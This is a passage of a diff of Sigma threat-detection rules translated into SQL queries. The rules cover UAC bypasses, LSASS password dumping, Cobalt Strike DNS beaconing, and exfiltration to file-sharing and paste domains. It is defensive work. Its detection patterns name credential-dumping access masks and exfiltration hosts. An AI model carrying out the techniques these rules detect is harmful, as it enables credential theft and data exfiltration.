LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%transfer.sh%' ESCAPE '\\' OR Path LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Path LIKE '%pastebin.com%' ESCAPE '\\' OR Path LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Path LIKE '%mediafire.com%' ESCAPE '\\' OR Path LIKE '%mega.nz%' ESCAPE '\\' OR Path LIKE '%ddns.net%' ESCAPE '\\' OR Path LIKE '%.paste.ee%' ESCAPE '\\' OR Path LIKE '%.hastebin.com%' ESCAPE '\\' OR Path LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Path LIKE '%ufile.io%' ESCAPE '\\' OR Path LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Path LIKE '%anonfiles.com%' ESCAPE '\\' OR Path LIKE '%send.exploit.in%' ESCAPE '\\' OR Path LIKE '%privatlab.net%' ESCAPE '\\' OR Path LIKE '%privatlab.com%' ESCAPE '\\' OR Path LIKE '%sendspace.com%' ESCAPE '\\' OR Path LIKE '%pastetext.net%' ESCAPE '\\' OR Path LIKE '%pastebin.pl%' ESCAPE '\\' OR Path LIKE '%paste.ee%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_winsat.yml" + "filename": "win_appxdeployment_server_susp_domains.yml" }, { - "title": "Suspicious Word Cab File Write CVE-2021-40444", - "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", - "status": "experimental", - "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", - "author": "Florian Roth (Nextron Systems), Sittikorn S", + "title": "HybridConnectionManager Service Running", + "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" ], - "filename": "file_event_win_winword_cve_2021_40444.yml" + "filename": "win_hybridconnectionmgr_svc_running.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", - "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", - "status": "test", - "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", - "author": "Florian Roth (Nextron Systems)", + "title": "Loading Diagcab Package From Remote Path", + "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "status": "experimental", + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.resource_development", - "attack.t1587", - "cve.2021.1675" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate package hosted on a known and authorized remote location" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '101' AND PackagePath LIKE '%\\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "file_event_win_cve_2021_1675_printspooler.yml" + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml" }, { - "title": "Windows Shell File Write to Suspicious Folder", - "id": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "status": "experimental", - "description": "Detects a Windows executable that writes files to suspicious folders", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection - Security", + "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\') AND (TargetFilename LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_shell_write_susp_directory.yml" + "filename": "win_security_susp_outbound_kerberos_connection.yml" }, { - "title": "Powerup Write Hijack DLL", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", - "status": "test", - "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", - "author": "Subhash Popuri (@pbssubhash)", + "title": "Generic Password Dumper Activity on LSASS", + "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "status": "experimental", + "description": "Detects process handle on LSASS process with certain access mask", + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.001" + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" ], "falsepositives": [ - "Any powershell script that creates bat files" + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_powerup_dllhijacking.yml" + "filename": "win_security_susp_lsass_dump_generic.yml" }, { - "title": "Created Files by Office Applications", - "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "status": "experimental", - "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "title": "Weak Encryption Enabled and Kerberoast", + "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", + "status": "test", + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", + "author": "@neu5ron", "tags": [ - 